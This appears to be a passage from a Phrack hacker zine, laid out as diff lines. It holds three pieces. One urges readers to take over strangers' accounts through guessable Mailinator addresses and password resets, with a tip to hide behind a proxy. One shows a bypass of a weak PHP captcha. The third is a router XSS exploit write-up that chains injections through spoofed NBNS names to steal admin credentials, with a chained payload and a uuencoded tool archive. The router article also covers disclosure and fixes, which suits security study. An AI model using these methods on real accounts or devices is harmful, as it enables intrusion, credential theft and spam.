+soaked in spam is to use your real email address to sign up to every
+shiney new website which tickles your fancy. By creating a mailinator
+account and submitting that instead, the user can visit the mailinator
+website to retrieve the sign up email. Since this is not the users
+regular email account, any spam sent to it is inconsequential.
+
+The flaw with this however, is that your typical user just isn't
+creative enough to work with a system designed this way. When creating
+a fresh anonymous email account for a new website a typical users
+thought process goes something like this:
+
+a) Look up at URL for name of site
+b) Append said name to mailinator domain
+c) ???
+d) Profit
+
+This opens up a nice way for the internet's more shady characters to
+quickly gain access to almost any popular website via the commonly
+implemented "password reset" functionality.
+
+But wait, you say. Surely you jest? No one could be capable of such
+silly behavior on the internet!
+
+Alas... Apparenly Mike & Debra could.
+
+"An email with instructions on how to access Your Account has been sent to
+you at netflix@mailinator.com"
+
+"Netflix password request
+
+"Dear Mike & Debra,
+We understand you'd like to change your password. Just click here and
+follow the prompts. And don't forget your password is case sensitive."
+
+;) ?
+
+At least security folk would be immune to this you say! There's no way
+that gmail@mailinator.com would allow one to reset 2600LA's mailing list
+password...
+
+As you can imagine it's easy to wile away some time with possible
+targets ranging from popular MMO's to banking websites. Just make sure
+you use a proxy so you don't have to phone them up and give them their
+password back... *cough*
+
+Have fun! ;)
+
+                       --DangerMouse <Phrack@mailinator.com>
+
+P.S. With the rise in the popularity of social networking websites
+mailinator felt the need to go all web 2.0 by including a fancy list of
+people who "Like" mailinator on Facebook. AKA a handy target list for a
+bored individual with scripting skillz.
+
+References:
+[1] Mailinator: http://www.mailinator.com
+[2] Netflix: http://www.netflix.com
+
+
+|=[ 0x03 ]=---=[ Captchas Round 2 - phpc0derZ@phrack.org ]=--------------=|
+
+                     [ Or why we suck even more ;> ]
+
+Let's face it, our lazyness got us ;-) So what's the story behind our
+captcha? Ironically enough, the original script is coming from this URL:
+
+http://www.white-hat-web-design.co.uk/articles/php-captcha.php <-- :)))))))
+
+8<----------------------------------------------------------------------->8
+<?php
+session_start();
+
+/*
+* File: CaptchaSecurityImages.php
+* Author: Simon Jarvis
+* Copyright: 2006 Simon Jarvis
+* Date: 03/08/06
+* Updated: 07/02/07
+* Requirements: PHP 4/5 with GD and FreeType libraries
+* Link: http://www.white-hat-web-design.co.uk/articles/php-captcha.php
+*
+* This program is free software; you can redistribute it and/or
+* modify it under the terms of the GNU General Public License
+* as published by the Free Software Foundation; either version 2
+* of the License, or (at your option) any later version.
+*
+* This program is distributed in the hope that it will be useful,
+* but WITHOUT ANY WARRANTY; without even the implied warranty of
+* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+* GNU General Public License for more details:
+* http://www.gnu.org/licenses/gpl.html
+*
+*/
+
+
+class CaptchaSecurityImages {
+
+   var $font = 'monofont.ttf';
+
+   function generateCode($characters)
+   {
+      /* list all possible characters, similar looking characters and
+       * vowels have been removed */
+     $possible = '23456789bcdfghjkmnpqrstvwxyz'; $code = ''; $i = 0;
+     while ($i < $characters) {
+       $code .= substr($possible, mt_rand(0, strlen($possible)-1),1);
+       $i++;
+     }
+     return $code;
+   }
+
+   function CaptchaSecurityImages(
+        $width='120',
+        $height='40',
+        $characters='6')
+   {
+      $code = $this->generateCode($characters);
+      /* font size will be 75% of the image height */
+      $font_size = $height * 0.75;
+      $image = imagecreate($width, $height)
+      or die('Cannot initialize new GD image stream');
+      /* set the colours */
+      $background_color = imagecolorallocate($image, 255, 255, 255);
+      $text_color = imagecolorallocate($image, 20, 40, 100);
+      $noise_color = imagecolorallocate($image, 100, 120, 180);
+      /* generate random dots in background */
+      for( $i=0; $i<($width*$height)/3; $i++ ) {
+         imagefilledellipse($image,
+                            mt_rand(0,$width),
+                            mt_rand(0,$height),
+                            1,
+                            1,
+                            $noise_color);
+      }
+      /* generate random lines in background */
+      for( $i=0; $i<($width*$height)/150; $i++ ) {
+         imageline($image,
+                   mt_rand(0,$width),
+                   mt_rand(0,$height),
+                   mt_rand(0,$width),
+                   mt_rand(0,$height),
+                   $noise_color);
+      }
+      /* create textbox and add text */
+      $textbox = imagettfbbox($font_size,
+                              0,
+                              $this->font,
+                              $code)
+      or die('Error in imagettfbbox function');
+      $x = ($width - $textbox[4])/2;
+      $y = ($height - $textbox[5])/2;
+      imagettftext($image,
+                   $font_size,
+                   0,
+                   $x,
+                   $y,
+                   $text_color,
+                   $this->font ,
+                   $code)
+      or die('Error in imagettftext function');
+      /* output captcha image to browser */
+      header('Content-Type: image/jpeg');
+      imagejpeg($image);
+      imagedestroy($image);
+      $_SESSION['security_code'] = $code;
+   }
+
+}
+
+$width = isset($_GET['width']) && $_GET['width']<600?$_GET['width']:'120';
+$height = isset($_GET['height'])&&$_GET['height']<200?$_GET['height']:'40';
+$characters = isset($_GET['characters'])
+&& $_GET['characters']>2?$_GET['characters']:'6';
+
+$captcha = new CaptchaSecurityImages($width,$height,$characters);
+
+?>
+8<----------------------------------------------------------------------->8
+
+The reason why this particular script was chosen was lost in the mist of
+time so let's focus instead on the code:
+
+----[ 1 - Oops
+
+OK so darkangel was right, the script is *really* poorly designed:
+    -> The set of possible characters is limited to 28 characters
+    -> The characters are inserted in the image using imagettfbbox()
+           with (amongst other things) a fixed $font_size, a predictable
+           position, etc.
+    -> The noise itself is generated using lines and circles of the
+       same color ($noise_color) which makes it trivial to remove.
+
+Ok so we knew that it was crappy but there is even more. darkjoker's
+approach can be seen as a dictionnary attack applied when the noise has
+been removed. There is much more simple: since the characters are not
+distorded, we can easily recover them using an OCR software. Luckily there
+exists a GNU one: gocr. We tested it against the imagettfbbox() function
+and without surprise ... it worked.
+
+Hey man, it wasn't worth to spend that much time :>
+
+----[ 2 - Oops (bis)
+
+We located two interested things in the script and if you're a proficient
+PHP reader then you've probably noticed them too... ;-)
+
+    a) The number of characters inserted in the image is user controlled.
+       If an attacker calls http://phrack.org/captcha.php?characters=x then
+       he can generate a captcha with X characters ( x >= 2 ). This
+       shouldn't be an issue itself since captcha.php is called by the
+       server. However it is because...
+
+    b) The script includes an interesting line:
+            $_SESSION['security_code'] = $code;
+       This clearly means that the PHP session will only keep track of
+       the *last* $code. While this is a normal behavior (some captcha
+       aren't readable at all so the user must be allowed to refresh),
+       this will be at our advantage.
+
+This gives us the opportunity to mount a new attack:
+    -> I'm a spam bot and I'm writing some shit comment about how big &
+       hard your penis will be when you will purchase my special pills. A
+       PHP session is created.
+    -> A captcha is loaded and because I'm a bot I can't fucking read it.
+       Too bad for me.
+    -> Within the same session I call captcha.php with ?characters=2.
+       With a probability of 1/(28*28) I will be able to predict the
+       code generated. I'll try as many times as required until I'm right.
+    -> I will most likely succeed in the end and some poor desperate guy
+       may purchase the pills.
+
+We've changed the captcha mechanism, the old one being captcha_old.php
+
+----[ 3 - Conclusion
+
+Who knows if spammers are reading phrack? One thing is sure: the script is
+very present on Internet... Yes you should patch xD
+
+
+|=[ 0x04 ]=---=[ XSS Using NBNS on a Home Router - Simon Weber ]=--------=|
+
+
+--[ code is appended, but may not be the most recent. check:
+    https://github.com/simon-weber/XSS-over-NBNS
+    for the most recent version. ]--
+
+--[ Contents
+
+    1 - Abstract
+
+    2 - Test Device Background
+
+    3 - Injection Chaining Technique
+
+    4 - Device Specific Exploits
+     4.1 - Steal Router Admin Credentials
+     4.2 - Hide a Device on the Network
+
+    5 - Tool
+
+    6 - Fix, Detection and Prevention
+
+    7 - Applications
+
+    8 - References
+
+
+--[ 1 - Abstract
+
+For routers which:
+
+        1) use NBNS to identify attached devices
+        2) list these devices on their web admin interface
+        3) do not sanitize the names they receive
+
+there exists a 15 character injection vector on the web interface. This
+vector can be exploited by anyone on the network, and will affect anyone
+who visits a specific page on the web administration interface. Using
+multiple injections in sequence separated with block comments, it is
+possible to chain these injections to create a payload of arbitrary length.
+This can be used to gain router admin credentials, steal cookies from an
+admin, alter the view of attached devices, or perform any other XSS attack.
+
+The real world application of the technique is limited by how often admins
+are on the web interface. However, coupled with some social engineering,
+small businesses such as coffee shops may be vulnerable.
+
+--[ 2 - Test Device Background
+
+I got a Netgear wgr614 v5 for less than $15 shipped on eBay. This is a
+common home wireless B/G router. Originally released in 2004, its EOL was
+about 5 years ago [1].
+
+The web admin interface is pretty poorly built (sorry, Netgear!). If you
+poke around, you'll find a lot of unescaped input fields to play with.
+However, none of them can really be used to do anything interesting -
+they're one time injection vectors that other users won't see.
+
+However, there is one interesting page. This is the "attached devices" page
+(DEV_devices.htm). It shows a table of what's connected to the router, and
+looks something like this:
+
+        #  Name        IP              MAC
+        1  computer_1  192.168.1.2     07:E0:17:8F:11:2F
+        2  computer_2  192.168.1.11    AF:3C:07:4D:B0:3A
+        3     --       192.168.1.15    EB:3C:76:0F:67:43
+
+This table is generated from the routing table, and the name is filled in
+from NBNS responses to router requests. If a machine doesn't respond to
+NBNS, takes too long to respond, or it gives an invalid name (over 15
+characters or improperly terminated), the name is set to "--". The table is
+refreshed in two ways: automatically by the router at an interval, and by a
+user visiting or refreshing the page.
+
+A quick test showed that the name in this table was unescaped. However,
+this only gets us 15 characters of payload. I couldn't manage to squeeze a
+reference to external code in just 15 characters (maybe someone else can?).
+Executing arbitrary code will require something a bit more sophisticated.
+
+--[ 3 - Injection Chaining Technique
+
+The obvious way to get more characters for the payload is by chaining
+together multiple injections. To do this, we need a few things:
+
+    1) A way to make multiple entries in the table:
+        This is easy, we just send out fake responses for IP/MAC
+        combinations that don't already exist on the network.
+
+    2) A way to control the order of our entries:
+        Also easy: the table orders by IP address. We'll just use a
+        range of incremental addresses that no one else is using.
+
+    3) A way to chain our entries around the other html:
+        Block comments will work for this. Our injections will just open
+        and close block comments at the end and beginning of their
+        reported names. For an illustration, imagine anything between <>
+        will be ignored on the page, and our name injections are
+        delimited with single quotes:
+
+                      '[name 1] <' [ignored stuff]
+    [ignored stuff] '> [name 2] <' [ignored stuff]
+           ...      '> [name 3] <'      ...
+
+Great, that was easy. What kind of block comments can we use? How about
+html's?. This could work, but it has limitations. First off, -- or >
+anywhere in the commented out html will break things. Even if this did
+work, we'd have to be careful about where we split things, and the comments
+would take up about half of a 15 char name.
+
+Javascript's c-style block comments are smaller and more flexible. They can
+come anywhere in code, so long as it isn't the middle of a token. For
+example,
+
+            document/* ignored */.write("something")
+
+    is fine, while
+
+            docu/* uh oh */ment.write("something")
+
+    breaks things.
+
+We also just need to avoid */ in the commented out html, which should be
+much less likely to pop up than >. To use javascript block comments, we'll
+obviously need to use javascript to get our payload onto the page. Call it
+our "payload transporter". This will work just fine:
+
+            "<script>document.write('[payload]');</script>"
+
+So, then, the first thing to do is fit our transporter into 15 char chunks
+to send as our first few fake NBNS names. Being careful not to split tokens
+with comments, our first 3 names can be:
+
+            <script>/*
+            */document./*
+            */write(/*
+
+This will open the write command to inject our payload. Now we need to
+package the payload into the transporter in some more 15 char chunks. Since
+strings are tokens, we can't split one big string with block comments. We
+need to split up the payload into multiple strings and introduce more
+tokens between them. To do this, I leveraged the fact that document.write
+can take multiple arguments, which it will write in order - the commas that
+split parameters will be our extra tokens. String concatenation would work,
+too. So, our payload will be packaged into the transporter like:
+
+            'first part of payload', /*
+            */ 'second part of payload', /*
+            */ 'third part...', /*
+                    ...
+            */ ,'last part'); /*
+
+It's easy to control the length of the strings to fit into the 15 char
+length (we've just got to be careful about quotes in our payload). Lastly,
+we just need to close the script tag, and we're done. We now have a way to
+write an arbitrary length payload onto the attached devices page. Putting
+it all together, here's an example of what our series of fake NBNS
+responses could be if we wanted to get '<script>alert("test");</script>'
+onto the page:
+
+            Spoofed NBNS Name   IP               MAC
+            <script>/*          192.168.1.111    00:00:00:00:00:01
+            */document./*       192.168.1.112    00:00:00:00:00:02
+            */write(/*          192.168.1.113    00:00:00:00:00:03
+            */'<script>',/*     192.168.1.114    00:00:00:00:00:04
+            */'alert(\'',/*     192.168.1.115    00:00:00:00:00:05
+            */'test\');',/*     192.168.1.116    00:00:00:00:00:06
+            */'</script',/*     192.168.1.117    00:00:00:00:00:07
+            */'>');/*           192.168.1.118    00:00:00:00:00:08
+            */</script>         192.168.1.119    00:00:00:00:00:09
+
+There are a few other practical considerations that I found while working
+with my specific Netgear router. It will use the most recent information it
+has for device names. This means that we have to send our payload every
+time that requests are sent out. It also means that for some time after we
+stop injecting, the device listing is going to have a number of '--'
+entries; the router is expecting to get names for these devices but sees no
+response. To hide our tracks, we could reboot the router when finished
+(this is possible by either injection or after stealing admin credentials,
+which is detailed below).
+
+We also have to be careful that a legitimate device doesn't come on to the
+network with one of our spoofed IPs or MACs. This could possibly break our
+injection, depending on the timing of responses.
+
+One last thing to keep in mind: the NBNS packets need to get on the wire
+quickly, since the router only listens for NBNS responses for a short time.
+Thus, smaller payloads (which fit into less packets) are more likely to
+succeed. You'll want to create external javascript to do any heavy lifting,
+and just inject code to run it. When a payload fails, earlier packets will
+get there and others won't, leaving garbage in the attached devices list.
+
+--[ 4 - Device Specific Exploits
+
+Naturally, anything that can be done with XSS or javascript is fair game.
+You can attack the user (cookie stealing), the router (injected requests to
+the web interface are now authed), or the page itself. I created a few
+interesting examples that are specific to the Netgear device I had.
+
+------[ 4.1 - Steal Router Admin Credentials
+
+On the admin interface, there is an option to backup and restore the router
+settings. It generates a simple flat file database called netgear.cfg. This
+file itself is actually rather interesting. It seems to be a plaintext
+memory dump, guarded from manipulation by a checksum that I couldn't figure
+out (no one has cracked it as of the time this was written - if you do, let
+me know). In it, you'll find everything from wireless keys to static routes
+to - surprise - plaintext administrator information. This includes
+usernames and passwords for both the http admin and telnet super admin (see
+[3] for information on the hidden telnet console).
+
+It's easy to steal this file via XSS in the same way that cookies are
+stolen. The attacker first sets up a listening http server to receive the
+information. Then, the injection code simply GETs the file and sends it off
+to the listening server.
+
+With admin access to the router, the attacker can do all sorts of things.
+Basic traffic logging is built-in, and can even be emailed out
+automatically. DoS is possible through the router's website blocking
+functions. Man in the middle attacks are possible through the exposed dhcp
+dns, static routing and internet connection configuration options.
+
+------[ 4.2 - Hide a Device on the Network
+
+The only place that an admin can get information about who is on the
+network is right on the page we inject to. Manipulating the way the device
+list is displayed could provide simple counter-detection against a
+suspicious administrator.
+
+For this exploit, we inject javascript to iterate through the table and
+remove any row that matches a device we're interested in. Then, the table
+is renumbered. Note that we don't have to own the device to remove it from
+the list.
+
+Going one step further, the attacker can bolster the cloak of invisibility.
+Blocking connections not originating from the router is an obvious choice.
+It might be wise to block pings directly from the router as well.
+
+--[ 5 - Tool
+
+I used Scapy with Python to implement the technique and exploits described
+above and hosted it on Github [2]. You can also specify a custom exploit
+that will be packaged and sent using my chaining technique. I also made a
+simple python http server to listen for stolen admin credentials and serve
+up external exploit code. Credit goes to Robert Wesley McGrew for NBNSpoof;
+I reused some of his code [4].
+
+To combat the problem I described earlier about sending packets quickly, I
+listen for the first request from the router and precompute the response
+packets to send. These will be sent as responses to any other requests
+sniffed. You'll notice this if you use my tool; a "ready to inject" message
+will be printed after the responses are generated.
+
+If you look at my built-in exploits, you'll see they each use a loadhelp2
+function as the entry point. This is just an easy way to get them to run
+when the page is loaded. The router declares the loadhelp function
+externally, and runs it on page load; I declare it on the page (so my
+version is actually used), and use it to launch my external loadhelp2 code.
+Then, the original code is patched on to the end, so the user doesn't
+notice.
+
+--[ 6 - Fix, Detection and Prevention
+
+To close the hole, Netgear would only need to change some web backend code
+in the firmware to escape NBNS names. I contacted Netgear about this. They
+won't make a fix for this specific model - it already saw its support EOL -
+but they are checking their newer models for this flaw as of September 2011
+[1].
+
+So, if you have this router, know that a fix isn't coming. While it may be
+difficult to initially detect that a device you own is being attacked, once
+you suspect it there are simple ways to verify it:
+
+        check the source of the affected page; you'll see the commented
+        out device entries with suspicious names
+
+        use the hidden telnet interface. This will show the many fake
+        IPs that are generated when packing a payload.
+
+        as a last resort, watch network traffic for malformed NBNS names
+
+Also, keep in mind that you can only be affected when checking your
+router's configuration. You could protect yourself completely by never
+visiting the web administration interface.
+
+--[ 7 - Applications
+
+Of course, this technique's practical application is limited to how often
+users check their router admin pages. However, when coupled with some
+social engineering, I could imagine a vulnerability for small businesses
+like coffee shops.
+
+These locations commonly offer wireless using off-the-shelf hardware like
+my Netgear router. Getting on their network is easy - it's already open. At
+this point, the attacker starts the exploit, then convinces an employee to
+check the admin pages (maybe "I'm having some strange issues with the
+wireless...Can you check on the router and see if my device is showing
+up?"). I'm sure a practiced social engineer would have no trouble pulling
+this off.
+
+As far as applying this beyond the home networking realm, a good place to
+start would be investigating this technique on other routers or better
+firmwares like DD-WRT or Tomato. That would at least determine if this is a
+common flaw. I didn't have another device to play with (the wgr614v5
+doesn't work with other firmware), so I'll leave it for someone else to
+try.
+
+I'm doubtful that other applications very different from what I described
+exist. Router administration pages simply aren't viewed very much. However,
+the broader idea of XSS through spoofed NBNS names might be applicable to a
+different domain. Anywhere there is a listing of NBNS names, there is the
+possibility of an injection vector.
+
+--[ 8 - References
+
+[1]  private communication with Netgear, September 2011
+[2]  https://github.com/simon-weber/XSS-over-NBNS
+[3]  http://www.seattlewireless.net/NetgearWGR614#TelnetConsole
+[4]  http://www.mcgrewsecurity.com/tools/nbnspoof/
+
+
+                                           October 2011
+                                           Simon Weber
+                                           sweb090 _at_ gmail.com
+
+
+begin 644 xss_over_nbns.tgz
+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
